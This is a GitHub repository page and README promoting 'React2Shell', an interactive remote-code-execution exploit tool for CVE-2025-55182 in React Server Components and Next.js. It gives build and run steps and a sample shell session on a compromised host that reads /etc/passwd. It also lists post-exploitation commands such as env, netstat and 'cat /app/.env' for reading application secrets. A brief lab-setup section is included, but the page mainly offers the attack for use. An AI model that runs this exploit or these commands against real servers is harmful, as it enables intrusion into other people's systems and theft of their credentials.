Skip to content

hexsh1dow/CVE-2025-55182

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

3 Commits
 
 
 
 
 
 

Repository files navigation

👻 CVE-2025-55182 Go exploit

Interactive RCE exploitation tool for CVE-2025-55182 (React Server Components)

GitHub Stars License Go

🎯 What Is This?

CVE-2025-55182 is a minimal, interactive RCE exploitation tool targeting CVE-2025-55182, a critical vulnerability in React Server Components (RSC) affecting React 19.0.0 - 19.2.0 and Next.js applications.

Note: This project is a re-upload from my old, deleted GitHub account (Hghost0x00). More projects will be added soon.


📦 Installation

Prerequisites

  • Go 1.18 or higher
  • A vulnerable target running React 19.0.0 - 19.2.0

Build from source

git clone https://github.com/hexsh1dow/CVE-2025-55182.git
cd CVE-2025-55182
go build -o CVE-2025-55182 main.go

🚀 Usage

Basic Usage

./CVE-2025-55182

Interactive Session

_____________   _______________         _______________   ________   .________          .________.____________  ______  ________  
╲_   ___ ╲   ╲ ╱   ╱╲_   _____╱         ╲_____  ╲   _  ╲  ╲_____  ╲  │   ____╱          │   ____╱│   ____╱_   │╱  __  ╲ ╲_____  ╲ 
╱    ╲  ╲╱╲   Y   ╱  │    __)_   ______  ╱  ____╱  ╱_╲  ╲  ╱  ____╱  │____  ╲   ______  │____  ╲ │____  ╲ │   │>      <  ╱  ____╱ 
╲     ╲____╲     ╱   │        ╲ ╱_____╱ ╱       ╲  ╲_╱   ╲╱       ╲  ╱       ╲ ╱_____╱  ╱       ╲╱       ╲│   ╱   ──   ╲╱       ╲ 
 ╲______  ╱ ╲___╱   ╱_______  ╱         ╲_______ ╲_____  ╱╲_______ ╲╱______  ╱         ╱______  ╱______  ╱│___╲______  ╱╲_______ ╲
        ╲╱                  ╲╱                  ╲╱     ╲╱         ╲╱       ╲╱                 ╲╱       ╲╱            ╲╱         ╲╱  

    React2Shell RCE | CVE-2025-55182
    @hexsh1dow

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
[?] Target: localhost:3000
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
[+] VULNERABLE
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

ghost@rce $ id
uid=1000(node) gid=1000(node) groups=1000(node)

ghost@rce $ whoami
node

ghost@rce $ pwd
/app

ghost@rce $ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
node:x:1000:1000::/home/node:/bin/bash

ghost@rce $ exit

Affected Versions:

  • React 19.0.0, 19.1.0, 19.1.1, 19.2.0
  • Next.js applications using these React versions

Patched Versions:

  • React 19.2.1+
  • Next.js with updated React dependency

🧪 Testing Lab Setup

Want to test this safely? Set up a vulnerable lab environment:

# Clone vulnerable Next.js app
git clone https://github.com/zack0x01/vuln-app-CVE-2025-55182.git
cd vuln-app-CVE-2025-55182

# Install and run
npm install --legacy-peer-deps
npm run dev

# In another terminal, run ghost-scanner
./CVE-2025-55182
# Enter: localhost:3000

📚 Common Commands

ghost@rce $ id                    # Check user privileges
ghost@rce $ whoami                # Current username
ghost@rce $ pwd                   # Current directory
ghost@rce $ ls -la                # List files
ghost@rce $ cat /etc/passwd       # Read files
ghost@rce $ uname -a              # System information
ghost@rce $ env                   # Environment variables
ghost@rce $ ps aux                # Running processes
ghost@rce $ netstat -tulpn        # Network connections
ghost@rce $ cat /app/.env         # Application secrets

📊 Repository Stats

GitHub repo size GitHub last commit GitHub issues


🔗 References


💬 Community & Support

Found a bug? Open an issue


⭐ Show Your Support

If this tool helped you:

  • Star this repository
  • 💬 Share with others

📝 License

This project is licensed under the MIT License - see the LICENSE file for details.


Made with 👻 by hexsh1dow
Happy hacking ⚡

About

Interactive RCE exploitation tool for CVE-2025-55182 (React Server Components)

Topics

Resources

License

Stars

Watchers

Forks

Contributors

Languages